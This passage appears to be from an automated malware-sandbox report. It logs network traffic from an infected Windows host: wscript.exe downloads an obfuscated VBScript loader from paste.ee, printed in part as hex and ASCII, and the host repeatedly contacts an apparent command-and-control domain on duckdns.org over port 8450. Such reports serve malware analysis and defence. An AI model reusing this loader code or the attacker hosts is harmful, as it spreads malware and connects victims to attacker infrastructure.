May 4, 2024 09:48:56.878730059 CEST	443	49739	131.153.147.50	192.168.2.4
May 4, 2024 09:48:56.878750086 CEST	49739	443	192.168.2.4	131.153.147.50
May 4, 2024 09:48:56.878803015 CEST	49739	443	192.168.2.4	131.153.147.50
May 4, 2024 09:48:56.879127979 CEST	443	49739	131.153.147.50	192.168.2.4
May 4, 2024 09:48:56.879139900 CEST	443	49739	131.153.147.50	192.168.2.4
May 4, 2024 09:48:56.879198074 CEST	49739	443	192.168.2.4	131.153.147.50
May 4, 2024 09:48:56.879270077 CEST	443	49739	131.153.147.50	192.168.2.4
May 4, 2024 09:48:56.879277945 CEST	443	49739	131.153.147.50	192.168.2.4
May 4, 2024 09:48:56.879323006 CEST	49739	443	192.168.2.4	131.153.147.50
May 4, 2024 09:48:56.924629927 CEST	443	49739	131.153.147.50	192.168.2.4
May 4, 2024 09:48:56.924638033 CEST	443	49739	131.153.147.50	192.168.2.4
May 4, 2024 09:48:56.924714088 CEST	49739	443	192.168.2.4	131.153.147.50
May 4, 2024 09:48:57.093542099 CEST	443	49739	131.153.147.50	192.168.2.4
May 4, 2024 09:48:57.093558073 CEST	443	49739	131.153.147.50	192.168.2.4
May 4, 2024 09:48:57.093628883 CEST	443	49739	131.153.147.50	192.168.2.4
May 4, 2024 09:48:57.093633890 CEST	49739	443	192.168.2.4	131.153.147.50
May 4, 2024 09:48:57.093705893 CEST	49739	443	192.168.2.4	131.153.147.50
May 4, 2024 09:48:57.093897104 CEST	49739	443	192.168.2.4	131.153.147.50
May 4, 2024 09:48:59.021795034 CEST	49741	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:48:59.368246078 CEST	8450	49741	12.221.146.138	192.168.2.4
May 4, 2024 09:48:59.872648954 CEST	49741	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:49:00.219347000 CEST	8450	49741	12.221.146.138	192.168.2.4
May 4, 2024 09:49:00.731805086 CEST	49741	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:49:01.077200890 CEST	8450	49741	12.221.146.138	192.168.2.4
May 4, 2024 09:49:01.591140032 CEST	49741	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:49:01.936506987 CEST	8450	49741	12.221.146.138	192.168.2.4
May 4, 2024 09:49:02.453285933 CEST	49741	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:49:02.800740004 CEST	8450	49741	12.221.146.138	192.168.2.4
May 4, 2024 09:49:02.921737909 CEST	49742	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:49:03.266995907 CEST	8450	49742	12.221.146.138	192.168.2.4
May 4, 2024 09:49:03.778628111 CEST	49742	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:49:04.124105930 CEST	8450	49742	12.221.146.138	192.168.2.4
May 4, 2024 09:49:04.778623104 CEST	49742	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:49:05.124260902 CEST	8450	49742	12.221.146.138	192.168.2.4
May 4, 2024 09:49:05.778711081 CEST	49742	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:49:06.124331951 CEST	8450	49742	12.221.146.138	192.168.2.4
May 4, 2024 09:49:06.778664112 CEST	49742	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:49:07.124547005 CEST	8450	49742	12.221.146.138	192.168.2.4
May 4, 2024 09:49:07.235600948 CEST	49744	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:49:07.581542969 CEST	8450	49744	12.221.146.138	192.168.2.4
May 4, 2024 09:49:08.091125011 CEST	49744	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:49:08.436717033 CEST	8450	49744	12.221.146.138	192.168.2.4
May 4, 2024 09:49:08.981852055 CEST	49744	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:49:09.327416897 CEST	8450	49744	12.221.146.138	192.168.2.4
May 4, 2024 09:49:09.981887102 CEST	49744	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:49:10.327274084 CEST	8450	49744	12.221.146.138	192.168.2.4
May 4, 2024 09:49:10.888005972 CEST	49744	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:49:11.239619017 CEST	8450	49744	12.221.146.138	192.168.2.4
May 4, 2024 09:49:15.835606098 CEST	49745	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:49:16.180944920 CEST	8450	49745	12.221.146.138	192.168.2.4
May 4, 2024 09:49:16.700556993 CEST	49745	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:49:17.055747986 CEST	8450	49745	12.221.146.138	192.168.2.4
May 4, 2024 09:49:17.700649977 CEST	49745	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:49:18.045864105 CEST	8450	49745	12.221.146.138	192.168.2.4
May 4, 2024 09:49:18.716124058 CEST	49745	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:49:19.066291094 CEST	8450	49745	12.221.146.138	192.168.2.4
May 4, 2024 09:49:19.716129065 CEST	49745	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:49:20.061593056 CEST	8450	49745	12.221.146.138	192.168.2.4
May 4, 2024 09:49:23.592124939 CEST	49746	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:49:23.937496901 CEST	8450	49746	12.221.146.138	192.168.2.4
May 4, 2024 09:49:24.528626919 CEST	49746	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:49:24.874198914 CEST	8450	49746	12.221.146.138	192.168.2.4
May 4, 2024 09:49:25.403723955 CEST	49746	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:49:25.749259949 CEST	8450	49746	12.221.146.138	192.168.2.4
May 4, 2024 09:49:26.419290066 CEST	49746	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:49:26.765815020 CEST	8450	49746	12.221.146.138	192.168.2.4
May 4, 2024 09:49:27.309931993 CEST	49746	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:49:27.655975103 CEST	8450	49746	12.221.146.138	192.168.2.4
May 4, 2024 09:49:32.295979023 CEST	49747	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:49:32.643630981 CEST	8450	49747	12.221.146.138	192.168.2.4
May 4, 2024 09:49:33.278703928 CEST	49747	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:49:33.625400066 CEST	8450	49747	12.221.146.138	192.168.2.4
May 4, 2024 09:49:34.278781891 CEST	49747	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:49:34.623943090 CEST	8450	49747	12.221.146.138	192.168.2.4
May 4, 2024 09:49:35.278719902 CEST	49747	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:49:35.624341011 CEST	8450	49747	12.221.146.138	192.168.2.4
May 4, 2024 09:49:36.294279099 CEST	49747	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:49:36.639964104 CEST	8450	49747	12.221.146.138	192.168.2.4
May 4, 2024 09:49:36.795761108 CEST	49748	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:49:37.141146898 CEST	8450	49748	12.221.146.138	192.168.2.4
May 4, 2024 09:49:37.655847073 CEST	49748	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:49:38.001698971 CEST	8450	49748	12.221.146.138	192.168.2.4
May 4, 2024 09:49:38.514256001 CEST	49748	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:49:38.859790087 CEST	8450	49748	12.221.146.138	192.168.2.4
May 4, 2024 09:49:39.372426033 CEST	49748	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:49:39.717719078 CEST	8450	49748	12.221.146.138	192.168.2.4
May 4, 2024 09:49:40.231846094 CEST	49748	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:49:40.581022978 CEST	8450	49748	12.221.146.138	192.168.2.4
May 4, 2024 09:49:40.717627048 CEST	49749	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:49:41.072487116 CEST	8450	49749	12.221.146.138	192.168.2.4
May 4, 2024 09:49:41.591160059 CEST	49749	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:49:41.946856022 CEST	8450	49749	12.221.146.138	192.168.2.4
May 4, 2024 09:49:42.591154099 CEST	49749	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:49:42.937153101 CEST	8450	49749	12.221.146.138	192.168.2.4
May 4, 2024 09:49:43.591175079 CEST	49749	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:49:43.936887980 CEST	8450	49749	12.221.146.138	192.168.2.4
May 4, 2024 09:49:44.481798887 CEST	49749	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:49:44.828995943 CEST	8450	49749	12.221.146.138	192.168.2.4
May 4, 2024 09:49:44.936371088 CEST	49750	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:49:45.281759024 CEST	8450	49750	12.221.146.138	192.168.2.4
May 4, 2024 09:49:45.794297934 CEST	49750	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:49:46.139919043 CEST	8450	49750	12.221.146.138	192.168.2.4
May 4, 2024 09:49:46.794374943 CEST	49750	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:49:47.140291929 CEST	8450	49750	12.221.146.138	192.168.2.4
May 4, 2024 09:49:47.778671026 CEST	49750	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:49:48.124142885 CEST	8450	49750	12.221.146.138	192.168.2.4
May 4, 2024 09:49:48.778862000 CEST	49750	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:49:49.124424934 CEST	8450	49750	12.221.146.138	192.168.2.4
May 4, 2024 09:49:53.546822071 CEST	49751	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:49:53.895661116 CEST	8450	49751	12.221.146.138	192.168.2.4
May 4, 2024 09:49:54.466284990 CEST	49751	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:49:54.817121983 CEST	8450	49751	12.221.146.138	192.168.2.4
May 4, 2024 09:49:55.466322899 CEST	49751	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:49:55.820214033 CEST	8450	49751	12.221.146.138	192.168.2.4
May 4, 2024 09:49:56.356878042 CEST	49751	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:49:56.703089952 CEST	8450	49751	12.221.146.138	192.168.2.4
May 4, 2024 09:49:57.216145039 CEST	49751	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:49:57.565088987 CEST	8450	49751	12.221.146.138	192.168.2.4
May 4, 2024 09:50:02.815160990 CEST	49752	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:50:03.160928011 CEST	8450	49752	12.221.146.138	192.168.2.4
May 4, 2024 09:50:03.669414043 CEST	49752	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:50:04.015059948 CEST	8450	49752	12.221.146.138	192.168.2.4
May 4, 2024 09:50:04.528697014 CEST	49752	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:50:04.873871088 CEST	8450	49752	12.221.146.138	192.168.2.4
May 4, 2024 09:50:05.388134956 CEST	49752	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:50:05.734191895 CEST	8450	49752	12.221.146.138	192.168.2.4
May 4, 2024 09:50:06.247596979 CEST	49752	8450	192.168.2.4	12.221.146.138
May 4, 2024 09:50:06.593635082 CEST	8450	49752	12.221.146.138	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 4, 2024 09:48:13.443979979 CEST	53059	53	192.168.2.4	1.1.1.1
May 4, 2024 09:48:13.606393099 CEST	53	53059	1.1.1.1	192.168.2.4
May 4, 2024 09:48:39.254041910 CEST	60838	53	192.168.2.4	1.1.1.1
May 4, 2024 09:48:39.414273977 CEST	53	60838	1.1.1.1	192.168.2.4
May 4, 2024 09:48:55.224283934 CEST	63240	53	192.168.2.4	1.1.1.1
May 4, 2024 09:48:55.790391922 CEST	53	63240	1.1.1.1	192.168.2.4
May 4, 2024 09:48:58.785834074 CEST	57445	53	192.168.2.4	1.1.1.1
May 4, 2024 09:48:59.019040108 CEST	53	57445	1.1.1.1	192.168.2.4
May 4, 2024 09:50:02.330769062 CEST	51315	53	192.168.2.4	1.1.1.1
May 4, 2024 09:50:02.567672014 CEST	53	51315	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 4, 2024 09:48:13.443979979 CEST	192.168.2.4	1.1.1.1	0x8ead	Standard query (0)	paste.ee	A (IP address)	IN (0x0001)	false
May 4, 2024 09:48:39.254041910 CEST	192.168.2.4	1.1.1.1	0x2b27	Standard query (0)	uploaddeimagens.com.br	A (IP address)	IN (0x0001)	false
May 4, 2024 09:48:55.224283934 CEST	192.168.2.4	1.1.1.1	0x4401	Standard query (0)	www.evolve27.com	A (IP address)	IN (0x0001)	false
May 4, 2024 09:48:58.785834074 CEST	192.168.2.4	1.1.1.1	0xe7d6	Standard query (0)	xwormay8450.duckdns.org	A (IP address)	IN (0x0001)	false
May 4, 2024 09:50:02.330769062 CEST	192.168.2.4	1.1.1.1	0x42dd	Standard query (0)	xwormay8450.duckdns.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 4, 2024 09:48:13.606393099 CEST	1.1.1.1	192.168.2.4	0x8ead	No error (0)	paste.ee		172.67.187.200	A (IP address)	IN (0x0001)	false
May 4, 2024 09:48:13.606393099 CEST	1.1.1.1	192.168.2.4	0x8ead	No error (0)	paste.ee		104.21.84.67	A (IP address)	IN (0x0001)	false
May 4, 2024 09:48:39.414273977 CEST	1.1.1.1	192.168.2.4	0x2b27	No error (0)	uploaddeimagens.com.br		104.21.45.138	A (IP address)	IN (0x0001)	false
May 4, 2024 09:48:39.414273977 CEST	1.1.1.1	192.168.2.4	0x2b27	No error (0)	uploaddeimagens.com.br		172.67.215.45	A (IP address)	IN (0x0001)	false
May 4, 2024 09:48:55.790391922 CEST	1.1.1.1	192.168.2.4	0x4401	No error (0)	www.evolve27.com	evolve27.com		CNAME (Canonical name)	IN (0x0001)	false
May 4, 2024 09:48:55.790391922 CEST	1.1.1.1	192.168.2.4	0x4401	No error (0)	evolve27.com		131.153.147.50	A (IP address)	IN (0x0001)	false
May 4, 2024 09:48:59.019040108 CEST	1.1.1.1	192.168.2.4	0xe7d6	No error (0)	xwormay8450.duckdns.org		12.221.146.138	A (IP address)	IN (0x0001)	false
May 4, 2024 09:50:02.567672014 CEST	1.1.1.1	192.168.2.4	0x42dd	No error (0)	xwormay8450.duckdns.org		12.221.146.138	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

paste.ee

uploaddeimagens.com.br

www.evolve27.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	172.67.187.200	443	6780	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-04 07:48:14 UTC	319	OUT	GET /d/Pz7Nj HTTP/1.1 Accept: / Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: paste.ee Connection: Keep-Alive
2024-05-04 07:48:14 UTC	1230	IN	HTTP/1.1 200 OK Date: Sat, 04 May 2024 07:48:14 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close Cache-Control: max-age=2592000 strict-transport-security: max-age=63072000 x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1; mode=block content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none' CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ToMwceUUkvA40gxZgIcNPc65iyYd0nYT%2Fp1AfGyEPtDxG6rpcLCuDidPOgim3JZRdMaH9VUzhR2hWJR7XCy79vs5mXdkmygAcl9CD6KdQXNI2zayKFShy8F9nA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87e6e3250b482b8f-LAX alt-svc: h3=":443"; ma=86400
2024-05-04 07:48:14 UTC	139	IN	Data Raw: 33 33 64 31 0d 0a 0d 0a 20 20 20 20 20 64 69 6d 20 73 6f 75 73 61 6e 61 73 20 2c 20 63 75 70 61 75 72 61 6e 61 20 2c 20 65 78 70 65 72 69 65 6e 74 65 20 2c 20 74 68 79 6d 61 6c 6c 6f 20 2c 20 65 6d 62 72 61 76 65 61 72 20 2c 20 43 61 6d 61 20 2c 20 65 6d 62 72 61 76 65 61 72 31 0d 0a 20 20 20 20 20 63 75 70 61 75 72 61 6e 61 20 3d 20 22 20 20 22 0d 0a 20 20 20 20 20 65 78 70 65 72 69 65 6e 74 65 20 20 3d 20 22 22 Data Ascii: 33d1 dim sousanas , cupaurana , experiente , thymallo , embravear , Cama , embravear1 cupaurana = " " experiente = ""
2024-05-04 07:48:14 UTC	1369	IN	Data Raw: 20 26 20 74 68 79 6d 61 6c 6c 6f 20 26 20 63 75 70 61 75 72 61 6e 61 20 26 20 74 68 79 6d 61 6c 6c 6f 20 26 20 22 67 42 31 44 67 54 72 65 47 34 44 67 54 72 65 59 77 42 30 44 67 54 72 65 47 6b 44 67 54 72 65 62 77 42 75 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 52 44 67 54 72 65 42 76 44 67 54 72 65 48 63 44 67 54 72 65 62 67 42 73 44 67 54 72 65 47 38 44 67 54 72 65 59 51 42 6b 44 67 54 72 65 45 51 44 67 54 72 65 59 51 42 30 44 67 54 72 65 47 45 44 67 54 72 65 52 67 42 79 44 67 54 72 65 47 38 44 67 54 72 65 62 51 42 4d 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 49 44 67 54 72 65 42 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 63 44 67 54 72 65 42 68 44 67 54 72 65 48 49 44 67 54 72 65 59 51 42 74 44 67 Data Ascii: & thymallo & cupaurana & thymallo & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDg
2024-05-04 07:48:14 UTC	1369	IN	Data Raw: 42 6b 44 67 54 72 65 47 38 44 67 54 72 65 62 51 44 67 54 72 65 67 44 67 54 72 65 43 30 44 67 54 72 65 51 77 42 76 44 67 54 72 65 48 55 44 67 54 72 65 62 67 42 30 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 73 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 4c 67 42 4d 44 67 54 72 65 47 55 44 67 54 72 65 62 67 42 6e 44 67 54 72 65 48 51 44 67 54 72 65 61 44 67 54 72 65 44 67 54 72 65 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 22 20 26 20 74 68 79 6d 61 6c 6c 6f 20 26 20 63 75 70 61 75 72 61 6e 61 20 26 20 74 68 79 6d 61 6c 6c 6f 20 26 20 22 67 42 76 44 67 54 72 65 48 49 44 67 54 72 65 22 20 26 20 74 68 79 6d 61 6c 6c 6f 20 26 20 63 75 70 61 75 72 61 6e 61 20 26 20 74 68 79 6d 61 6c 6c 6f Data Ascii: BkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTre" & thymallo & cupaurana & thymallo & "gBvDgTreHIDgTre" & thymallo & cupaurana & thymallo
2024-05-04 07:48:14 UTC	1369	IN	Data Raw: 6f 44 67 54 72 65 48 51 44 67 54 72 65 64 44 67 54 72 65 42 77 44 67 54 72 65 48 4d 44 67 54 72 65 4f 67 44 67 54 72 65 76 44 67 54 72 65 43 38 44 67 54 72 65 64 51 42 77 44 67 54 72 65 47 77 44 67 54 72 65 62 77 42 68 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 74 68 79 6d 61 6c 6c 6f 20 26 20 63 75 70 61 75 72 61 6e 61 20 26 20 74 68 79 6d 61 6c 6c 6f 20 26 20 22 44 67 54 72 65 42 6c 44 67 54 72 65 47 6b 44 67 54 72 65 62 51 42 68 44 67 54 72 65 47 63 44 67 54 72 65 22 20 26 20 74 68 79 6d 61 6c 6c 6f 20 26 20 63 75 70 61 75 72 61 6e 61 20 26 20 74 68 79 6d 61 6c 6c 6f 20 26 20 22 51 42 75 44 67 54 72 65 48 4d 44 67 54 72 65 4c 67 42 6a 44 67 54 72 65 47 38 44 67 54 72 65 62 51 44 67 54 72 65 75 44 67 54 72 65 47 49 44 67 54 72 65 63 67 44 67 54 72 Data Ascii: oDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTre" & thymallo & cupaurana & thymallo & "DgTreBlDgTreGkDgTrebQBhDgTreGcDgTre" & thymallo & cupaurana & thymallo & "QBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTr
2024-05-04 07:48:14 UTC	1369	IN	Data Raw: 54 72 65 78 44 67 54 72 65 44 4d 44 67 54 72 65 4f 44 67 54 72 65 44 67 54 72 65 34 44 67 54 72 65 44 49 44 67 54 72 65 4d 44 67 54 72 65 44 67 54 72 65 79 44 67 54 72 65 44 6b 44 67 54 72 65 4a 77 44 67 54 72 65 70 44 67 54 72 65 44 73 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 47 6b 44 67 54 72 65 62 51 42 68 44 67 54 72 65 47 63 44 67 54 72 65 22 20 26 20 74 68 79 6d 61 6c 6c 6f 20 26 20 63 75 70 61 75 72 61 6e 61 20 26 20 74 68 79 6d 61 6c 6c 6f 20 26 20 22 51 42 43 44 67 54 72 65 48 6b 44 67 54 72 65 64 44 67 54 72 65 42 6c 44 67 54 72 65 48 4d 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 39 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 52 44 67 54 72 65 42 76 44 67 54 72 65 48 63 44 67 54 72 65 62 67 42 73 44 67 54 72 65 Data Ascii: TrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTre" & thymallo & cupaurana & thymallo & "QBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTre
2024-05-04 07:48:14 UTC	1369	IN	Data Raw: 67 42 42 44 67 54 72 65 46 4d 44 67 54 72 65 52 51 44 67 54 72 65 32 44 67 54 72 65 44 51 44 67 54 72 65 58 77 42 54 44 67 54 72 65 46 51 44 67 54 72 65 51 51 42 53 44 67 54 72 65 46 51 44 67 54 72 65 50 67 44 67 54 72 65 2b 44 67 54 72 65 43 63 44 67 54 72 65 4f 77 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 65 22 20 26 20 74 68 79 6d 61 6c 6c 6f 20 26 20 63 75 70 61 75 72 61 6e 61 20 26 20 74 68 79 6d 61 6c 6c 6f 20 26 20 22 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 52 67 42 73 44 67 54 72 65 47 45 44 67 54 72 65 22 20 26 20 74 68 79 6d 61 6c 6c 6f 20 26 20 63 75 70 61 75 72 61 6e 61 20 26 20 74 68 79 6d 61 6c 6c 6f 20 26 20 22 77 44 67 54 72 65 67 44 67 54 72 65 44 30 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6e 44 67 54 72 65 44 77 44 Data Ascii: gBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTre" & thymallo & cupaurana & thymallo & "QBuDgTreGQDgTreRgBsDgTreGEDgTre" & thymallo & cupaurana & thymallo & "wDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwD
2024-05-04 07:48:14 UTC	1369	IN	Data Raw: 65 47 55 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 77 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4c 51 42 68 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 74 68 79 6d 61 6c 6c 6f 20 26 20 63 75 70 61 75 72 61 6e 61 20 26 20 74 68 79 6d 61 6c 6c 6f 20 26 20 22 44 67 54 72 65 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 65 22 20 26 20 74 68 79 6d 61 6c 6c 6f 20 26 20 63 75 70 61 75 72 61 6e 61 20 26 20 74 68 79 6d 61 6c 6c 6f 20 26 20 22 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 53 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 74 68 79 6d 61 6c 6c 6f 20 26 20 63 75 70 61 75 72 61 6e 61 20 26 20 74 68 79 6d 61 6c 6c 6f 20 26 20 22 51 42 34 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4c 51 42 6e 44 67 54 72 65 48 51 44 67 Data Ascii: eGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTre" & thymallo & cupaurana & thymallo & "DgTreDgTregDgTreCQDgTre" & thymallo & cupaurana & thymallo & "QBuDgTreGQDgTreSQBuDgTreGQDgTre" & thymallo & cupaurana & thymallo & "QB4DgTreCDgTreDgTreLQBnDgTreHQDg
2024-05-04 07:48:14 UTC	1369	IN	Data Raw: 69 44 67 54 72 65 48 4d 44 67 54 72 65 64 44 67 54 72 65 42 79 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 6e 44 67 54 72 65 43 67 44 67 54 72 65 4a 44 67 54 72 65 42 7a 44 67 54 72 65 48 51 44 67 54 72 65 59 51 42 79 44 67 54 72 65 48 51 44 67 54 72 65 53 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 74 68 79 6d 61 6c 6c 6f 20 26 20 63 75 70 61 75 72 61 6e 61 20 26 20 74 68 79 6d 61 6c 6c 6f 20 26 20 22 51 42 34 44 67 54 72 65 43 77 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 47 49 44 67 54 72 65 59 51 42 7a 44 67 54 72 65 47 55 44 67 54 72 65 4e 67 44 67 54 72 65 30 44 67 54 72 65 45 77 44 67 54 72 65 22 20 26 20 74 68 79 6d 61 6c 6c 6f 20 26 20 63 75 70 61 75 72 61 6e 61 20 26 20 74 68 79 6d 61 6c 6c 6f 20 26 20 22 51 Data Ascii: iDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTre" & thymallo & cupaurana & thymallo & "QB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTre" & thymallo & cupaurana & thymallo & "Q
2024-05-04 07:48:14 UTC	1369	IN	Data Raw: 54 72 65 44 73 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 48 51 44 67 54 72 65 65 51 42 77 44 67 54 72 65 47 55 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 39 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 73 44 67 54 72 65 47 38 44 67 54 72 65 59 51 42 6b 44 67 54 72 65 47 55 44 67 54 72 65 22 20 26 20 74 68 79 6d 61 6c 6c 6f 20 26 20 63 75 70 61 75 72 61 6e 61 20 26 20 74 68 79 6d 61 6c 6c 6f 20 26 20 22 44 67 54 72 65 42 42 44 67 54 72 65 48 4d 44 67 54 72 65 63 77 42 6c 44 67 54 72 65 47 30 44 67 54 72 65 59 67 42 73 44 67 54 72 65 48 6b 44 67 54 72 65 4c 67 42 48 44 67 54 72 65 47 55 44 67 54 72 65 64 44 67 54 72 65 42 55 44 67 54 72 65 48 6b 44 67 54 72 65 63 44 67 54 72 65 42 6c 44 67 54 72 65 43 67 Data Ascii: TreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTre" & thymallo & cupaurana & thymallo & "DgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCg
